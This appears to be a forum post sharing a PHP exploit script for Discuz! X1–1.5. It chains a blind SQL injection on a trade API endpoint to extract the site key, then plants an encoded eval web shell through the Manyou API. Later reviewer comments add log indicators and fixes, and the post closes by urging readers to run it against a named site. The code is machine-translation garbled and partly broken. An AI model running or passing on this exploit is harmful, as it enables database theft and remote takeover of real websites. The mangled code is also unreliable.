Discuz! X1.5 getshell 0day
Directly post and use code
Php
// Prints the author banner, then checks the command-line argument count.
// NOTE(review): this listing went through machine translation (spaces inside
// variable names, altered keyword case, reflowed string literals), so it is a
// record of the technique rather than a parseable PHP file.
Print_r ('
+ --------------------------------------------------------------------------- +
Discuz! X1-1.5 notify_crEdIt. php Blind SQL injectionExPloit by toby57 2010.11.05
Mail: toby57 at 163 dot com
Team: http://www.xiaoweio.cn
Note: alibaba adds the subsequent getshell code.
+ --------------------------------------------------------------------------- +
');
// With fewer than two argv entries, print the usage text (target URL plus an
// optional table prefix) and stop.
If ($ argc <2 ){
Print_r ('
+ --------------------------------------------------------------------------- +
Usage: php '. $ argv [0].' url [pre]
Example:
Php '. $ argv [0]. 'HTTP: // localhost/
Php '. $ argv [0]. 'HTTP: // localhost/xss _
+ --------------------------------------------------------------------------- +
');
Exit;
}
// Setup and first probe: read the target and table prefix from argv, build the
// endpoint path, and test whether the endpoint leaks database errors.
Error_reporting (7 );
Ini _Set('Max _ exeCutIon _Time', 0 );
$ Url = $ argv [1];
// Table prefix comes from argv[2] when given, otherwise a default string.
$ Pre = $ argv [2]? $ Argv [2]: 'pre _';
$ Target = parse_url ($ url );
// extract() turns the parse_url() parts into variables; send() and POST() below
// read $host and the path through globals/arguments.
ExTrAct ($ target );
// Request path under /api/trade/. The banner names notify_credit.php while this
// string reads policy_credit.php; when hunting in access logs, treat any
// unexpected POST to a script under /api/trade/ as relevant.
$ Path1 = $ path. '/api/trade/policy_credit.php ';
// Candidate alphabet for the later per-character guesses: code points 48-57
// and 97-102 (digits and a-f).
$ Hash = array ();
$ Hash = array_merge ($ hash, range (48, 57 ));
$ Hash = array_merge ($ hash, range (97,102 ));
// First probe is a lone single quote. The script uses the text 'SQL syntax' in
// the HTTP response as its yes/no signal, so the technique depends on the
// application returning raw database error text to the client.
// Defensive takeaway: bind the parameter instead of concatenating it, and do
// not display database errors to remote users.
$ Tmp_expstr = "'";
$ Res = send ();
If (strpos ($ res, 'SQL syntax') = faLsE) {var _DuMp ($ res); die ('oooops. I can NOT hack it .');}
// The leaked error message is also mined for the table prefix in front of
// forum_order; a match overrides the prefix chosen above.
Preg_match ('/FROM \ s ([a-zA-Z _] +) forum_order/', $ res, $ match );
If ($ match [1]) $ pre = $ match [1];
// Second probe selects from <prefix>common_setting to confirm the prefix.
$ Tmp_expstr = "'Union all select 0, 1, 0, 0, 0, 0, 0 FROM {$ pre} common_setting WHERE'' = '";
$ Res = send ();
// Fallback when the response says the table "doesn't exist": recover the table
// prefix one character at a time from information_schema.columns, using the
// same error-text signal as before.
// Detection note: every guess is a separate POST through send(), so this stage
// appears in logs as a burst of near-identical requests to one endpoint whose
// bodies reference information_schema.
If (strpos ($ res, "doesn't exist ")! = False ){
Echo "Table_pre is WRONG! \ NReady to Crack It. Please Waiting... \ n ";
// Outer loop: try prefix lengths 1..19 against table names that match
// forum_post_tableid.
For ($ I = 1; $ I <20; $ I ++ ){
$ Tmp_expstr = "'Union all select 0, 1, 0, 0, 0, 0, 0 FROM infoRmAtion_schema.ColUmns WHERE table_schema = database () AND table_name LIKE '% forum_post_tableId% 'And length (REPLACE (table_name, 'Forum _ post_tableid', '') = $ I AND'' = '";
$ Res = send ();
If (strpos ($ res, 'SQL syntax ')! = False ){
$ Pre = '';
// Candidate alphabet for prefix characters: the code points produced by the
// two range() calls plus 95 ('_').
$ Hash2 = array ();
$ Hash2 = array_merge ($ hash2, range (48, 57 ));
$ Hash2 = array_merge ($ hash2, range (0, 97,122 ));
$ Hash2 [] = 95;
// For each position $j, walk code points 0..255 and keep the first candidate
// that produces the signal.
For ($ j = 1; $ j <= $ I; $ j ++ ){
For ($ k = 0; $ k <= 255; $ k ++ ){
If (in_array ($ k, $ hash2 )){
$ Char = dechex ($ k );
$ Tmp_expstr = "'Union all select 0, 0, 0, 0, 0, 0 FROM information_schema.columns WHERE table_schema = database () AND table_name LIKE '% forum_post_tableid %' and mid (REPLACE (table_name, 'Forum _ post_tableid ', ''), $ j, 1) = 0x {$ char} AND'' = '";
$ Res = send ();
If (strpos ($ res, 'SQL syntax ')! = False ){
Echo chr ($ k );
$ Pre. = chr ($ k); break;
}
}
}
}
// A non-empty result is reported and ends the search; otherwise the script dies.
If (strlen ($ pre) {echo "\ nCracked... table_Pre :". $ pre. "\ n"; break;} else {die ('get Table_pre Failed .. ');};
}}};
// Reads a 32-character value out of <prefix>common_setting (column svalue, row
// selected by the hex-encoded skey literal), one position per outer iteration,
// testing only the digit/a-f alphabet held in $hash. The messages further down
// call this value my_sitekey.
// Defensive takeaway: this value is later used to sign an API request (see the
// md5() call in the upload stage), so on any site that was exposed it should be
// rotated after patching, not just left in place.
Echo "Please Waiting... \ n ";
$ Sitekey = '';
For ($ I = 1; $ I <= 32; $ I ++ ){
For ($ k = 0; $ k <= 255; $ k ++ ){
If (in_array ($ k, $ hash )){
$ Char = dechex ($ k );
$ Tmp_expstr = "'Union all select 0, 0, 0, 0, 0, 0 FROM {$ pre} common_setting WHERE skey = 0x6d795f742574656b6579 and mid (svalue, {$ I}, 1) = 0x {$ char} AND ''= '";
$ Res = send ();
If (strpos ($ res, 'SQL syntax ')! = False ){
Echo chr ($ k );
$ Sitekey. = chr ($ k); break;
}}}}
/*
By: alibaba
Modified and added some code. If the code is successfully modified, the shell can be obtained.
The secret is: cmd
*/
// Second stage, added by a different author: a signed request to the Manyou API
// endpoint that carries a base64 blob and the string "php" inside a serialized
// params array. The author's note above describes the result as a shell keyed
// on "cmd".
// The script continues even when no 32-character key was recovered and signs
// with whatever $sitekey holds, including an empty string.
If (strlen ($ sitekey )! = 32)
{
Echo "\ nmy_sitekey not found. try blank my_sitekey \ n ";
}
Else echo "\ nmy_sitekey: {$ sitekey} \ n ";
Echo "\ nUploading Shell ...";
// Indicators for log review (exact spellings may be translation-mangled here):
// a POST to /api/manyou/my.php with module=video, a serialized params value and
// an md5 sign field.
$ Module = 'video ';
$ Method = 'authauthauth ';
$ Params = 'a: 3: {I: 0; I: 1; I: 1; s: 36: "PD9waHAgZXZhbCgkX1BPU1RbY21kXSk7Pz4 ="; I: 2; s: 3: "php ";}';
// Signature is md5 over module|method|params|sitekey, so knowledge of the site
// key is the only thing authenticating this request.
$ Sign = md5 ($ module. '|'. $ method. '|'. $ params. '|'. $ sitekey );
$ Data = "module = $ module & method = $ method & params = $ params & sign = $ sign ";
$ Path2 = $ path. "/api/manyou/my. php ";
POST ($ host, 80, $ path2, $ data, 30 );
// Final stage: read the 32-character videophoto value for uid = 1 from
// <prefix>common_member_field_home with the same per-character method, then
// print a path of the form data/avatar/<1st char>/<2nd char>/<value>.php.
// Defensive takeaway: on a site suspected of compromise, look for .php files
// under data/avatar/ and check the videophoto field of uid 1; independently of
// this bug, the web server should not execute scripts from upload directories.
Echo "\ nGetting Shell LoCatIon... \ n ";
$File= '';
For ($ I = 1; $ I <= 32; $ I ++ ){
For ($ k = 0; $ k <= 255; $ k ++ ){
If (in_array ($ k, $ hash )){
$ Char = dechex ($ k );
$ Tmp_expstr = "'Union all select 0, 0, 0, 0, 0, 0 FROM {$ pre} common_member_field_home WHERE uid = 1 and mid (videophoto, {$ I}, 1) = 0x {$ char} AND ''= '";
$ Res = send ();
If (strpos ($ res, 'SQL syntax ')! = False ){
Echo chr ($ k );
$ File. = chr ($ k); break;
}
}
}
}
Echo "\ nShell: $ host $ path/data/avatar /".SuBstr ($ file, 0, 1). "/". substr ($ file, 1, 1). "/$ file. php ";
Exit;
// Computes the md5 signature sent with each trade-API request: a fixed
// attach/retcode string with $exp_str as the mch_vno value and nothing after
// "key =".
// NOTE(review): the empty key suggests the server-side check passes when no
// payment key is configured; confirm against the application's configuration.
FuNcTion sign ($ exp_str ){
Return md5 ("attach = tenpay &McH_vno = {$ exp_str} & retcode = 0 & key = ");
}
// Sends one probe: wraps the current global $tmp_expstr in a form body and
// POSTs it to $path1 on port 80 with a 30-second timeout, returning the raw
// response text.
// Body layout: attach, retcode, a fixed trade_no of %2527 (a double-URL-encoded
// single quote), the URL-encoded probe string as mch_vno, and the sign() value.
// Detection note: a trade_no of %2527 together with SQL keywords in mch_vno is
// a usable signature for WAF or log rules on this endpoint.
Function send (){
Global $ host, $ path1, $ tmp_expstr;
$ Expdata = "attach = tenpay & retcode = 0 & trade_no = % 2527 & mch_vno = ". urlencode ($ tmp_expstr )). "& sign = ". sign ($ tmp_expstr );
Return POST ($ host, 80, $ path1, $ expdata, 30 );
}
// Minimal HTTP client: opens a TCP socket with fsockopen(), writes an HTTP/1.0
// POST with a form-urlencoded body, reads the response until EOF and returns it
// (headers included) as one string.
// Parameters: $host/$port to connect to, $path for the request line, $data as
// the body, $timeout for the connect call. $cookie is accepted but never used
// in this body.
// Dies with the host, path and socket error when the connection fails.
Function POST ($ host, $ port, $ path, $ data, $ timeout, $ cookie = ''){
$ Buffer = '';
$ Fp = fsockopen ($ host, $ port, $ errno, $ errstr, $ timeout );
If (! $ Fp) die ($ host. '/'. $ path. ':'. $ errstr. $ errno );
Else {
// No User-Agent header is sent, and the request is HTTP/1.0 with
// "Connection: close"; both are visible in server access logs.
Fputs ($ fp, "POST $ path HTTP/1.0 \ r \ n ");
Fputs ($ fp, "Host: $ host \ r \ n ");
Fputs ($ fp, "Content-type: application/x-www-form-urlencoded \ r \ n ");
Fputs ($ fp, "Content-length:". strlen ($ data). "\ r \ n ");
Fputs ($ fp, "Connection: close \ r \ n ");
Fputs ($ fp, $ data. "\ r \ n ");
// Accumulate the whole response in 4096-byte reads.
While (! Feof ($ fp ))
{
$ Buffer. = fgets ($ fp, 4096 );
}
Fclose ($ fp );
}
Return $ buffer;
}
?>
Copy and save as xx. php php.exe xx. php www.xiaoweio.cn
Try that kind of station. The local test fails, and the virtual machine has a problem.